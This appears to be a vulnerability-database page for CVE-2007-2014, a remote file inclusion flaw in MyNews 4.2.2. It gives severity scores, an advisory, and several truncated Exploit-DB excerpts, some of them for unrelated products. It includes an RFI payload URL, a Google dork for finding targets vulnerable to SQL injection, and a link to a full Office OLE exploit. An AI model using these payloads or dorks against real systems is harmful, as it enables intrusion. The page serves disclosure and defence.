CVE-2007-2014
Published 2007-04-12
CVE-2007-2014: PHP remote file inclusion vulnerability in include/blocks/week_events.php in MyNews 4.2.2 allows remote attackers to execute arbitrary PHP code via a URL in…
Priority P339 | high | 7.5 | CVSS 2.0 | AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 2.27% (80.9th percentile)
PHP remote file inclusion vulnerability in include/blocks/week_events.php in MyNews 4.2.2 allows remote attackers to execute arbitrary PHP code via a URL in the myNewsConf[path][sys][index] parameter, a different vector than CVE-2007-0633.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mynews | mynews | — | — |
CVSS provenance
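| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| vendor_redhat | | 7.2 | HIGH | |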
GHSA
GHSA-488g-2jcc-pf9r: PHP remote file inclusion vulnerability in include/blocks/week_events
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2007-2014 [HIGH] GHSA-488g-2jcc-pf9r: PHP remote file inclusion vulnerability in include/blocks/week_events
PHP remote file inclusion vulnerability in include/blocks/week_events.php in MyNews 4.2.2 allows remote attackers to execute arbitrary PHP code via a URL in the myNewsConf[path][sys][index] parameter, a different vector than CVE-2007-0633.
Red Hat
qemu: cirrus: insufficient blit region checks
vendor_redhat·2014-12-04·CVSS 7.2
CVE-2014-8106 [HIGH] CWE-20 qemu: cirrus: insufficient blit region checks
Heap-based buffer overflow in the Cirrus VGA emulator (hw/display/cirrus_vga.c) in QEMU before 2.2.0 allows local guest users to execute arbitrary code via vectors related to blit regions. NOTE: this vulnerability exists because of an incomplete fix for CVE-2007-1320.
It was found that the Cirrus blit region checks were insufficient. A privileged guest user could use this flaw to write outside of VRAM-allocated buffer boundaries in the host's QEMU process address space with attacker-provided data.
Statement: This issue affects the qemu-kvm packages as shipped with Red Hat Enterprise Linux 6; a future update may address this flaw.
This issue affects the kvm packages as shipped with Red Hat Enterprise Linux 5. Red Hat Enterprise Linux 5 is now in
Exploit-DB
Microsoft Office 2007/2010 - OLE Arbitrary Command Execution
exploitdb·2014-11-12·CVSS 7.8
CVE-2014-6352 [HIGH] Microsoft Office 2007/2010 - OLE Arbitrary Command Execution
---
#
# Full exploit: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35216.rar
#
#CVE-2014-6352 OLE Remote Code Execution
#Author Abhishek Lyall - abhilyall[at]gmail[dot]com, info[at]aslitsecurity[dot]com
#Advanced Hacking Trainings - http://training.aslitsecurity.com
#Web - http://www.aslitsecurity.com/
#Blog - http://www.aslitsecurity.blogspot.com/
#Tested on win7 - office 2007 and 2010. The exploit will not give UAC warning the user account is administrator. Else there will be a UAC warning.
#No .inf file is required in this exploit
#The size of executable payload should be less than 400kb
#python 2.7 required
#The folder "temp" should be in same dir as this python file.
# usage - python.exe
Exploit-DB
YourMembers Plugin - Blind SQL Injection
exploitdb·2014-10-14
CVE-2014-100003 YourMembers Plugin - Blind SQL Injection
---
Vulnerability title: Blind SQL Injection Vulnerability in YourMembers plugin
CVE: N/A
Vendor: YourMembers plugin
Product: https://github.com/YourMembers/yourmembers/tree/master/ym_trunk
Affected version: Version 3, 29 June 2007 (https://github.com/YourMembers/yourmembers/blob/master/LICENSE)
Google dork: inurl:ym_download_id=
Fixed version: N/A
Reported by: Tien Tran Dinh - [email protected]
Details:
The Blind SQL injection vulnerability has been found and confirmed within the software as an anonymous user. A successful attack could allow an anonymous attacker to access information such as username and password hashes that are stored in the database. The following URL and parameter have been confirmed to suffer from blind SQL injection:
G
Exploit-DB
Microsoft Exchange - IIS HTTP Internal IP Address Disclosure (Metasploit)
exploitdb·2014-09-29
---
# Exploit Title: Microsoft Exchange IIS HTTP Internal IP Disclosure Vulnerability
# Google Dork: NA
# Date: 08/01/2014
# Exploit Author: Nate Power
# Vendor Homepage: microsoft.com
# Software Link: NA
# Version: Exchange OWA 2003, Exchange CAS 2007/2010/2013
# Tested on: Exchange OWA 2003, Exchange CAS 2007/2010/2013
# CVE : NA
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 'Outlook Web App (OWA) / Client Access Server (CAS) IIS HTTP Internal IP Disclosure',
'Description' => %q{
This module tests vulnerable IIS HTTP header file paths on Microsoft Exchange OWA 2003, CAS 2007, 2010, 201
Exploit-DB
Microsoft PowerPoint 2007 - Crash (PoC)
exploitdb·2013-07-01
CVE-2014-2671 Microsoft PowerPoint 2007 - Crash (PoC)
---
# Title : Microsoft Office PowerPoint 2007 Crash PoC
# Date: 2013-01-12
# Software Link: http://office.microsoft.com/
# Author: Asesino04
# Tested on: Windows XP SP2
# Special Thanks To : Ness Oum El Bouaghi
# Bug Description:
When you insert a sound into Microsoft Office PowerPoint 2007, the software crashes.
It was tested on Office 2007; all the versions may be affected too.
# Credit: This bug was found by Asesino04 "The Black Devils"
# Proof Of Concept
https://fbcdn-sphotos-g-a.akamaihd.net/hphotos-ak-prn1/601368_541967942509686_881180451_n.jpg
Exploit-DB
MyNews 4.2.2 - 'Week_Events.php' Remote File Inclusion
exploitdb·2007-04-10
CVE-2007-2014 MyNews 4.2.2 - 'Week_Events.php' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/23398/info
MyNews is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and to gain access to the underlying system.
This issue affects MyNews 4.2.2 and prior versions.
http://www.example.com/include/blocks/week_events.php?myNewsConf[path][sys][index]=[REMOTEFILE]?
Published: 2007-04-12